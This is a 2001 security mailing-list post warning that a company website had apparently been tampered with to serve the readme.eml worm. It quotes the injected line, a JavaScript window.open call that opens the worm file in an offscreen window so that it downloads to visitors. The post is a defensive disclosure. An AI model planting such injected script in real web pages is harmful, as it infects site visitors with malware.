Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Website automating download of readme.eml

From: Sean Kelly <lists () shortestpath org>
Date: Tue, 18 Sep 2001 17:17:58 +0100 (BST)
        This is not good.  http://www.amariplastics.com/ tries to
run/download the readme.eml worm/trojan/thing when you browse it.

        It looks like their website has been tampered with or something as
the last 3 lines of the HTML source read:

</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

which does exactly what it look like.

        Please be careful, one of the chaps here said it AUTOMATICALLY
downloaded and ran the file.  My machine asked me what to do.  I said
CANCEL, and so should you.

        Regards,

--
Sean Kelly


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: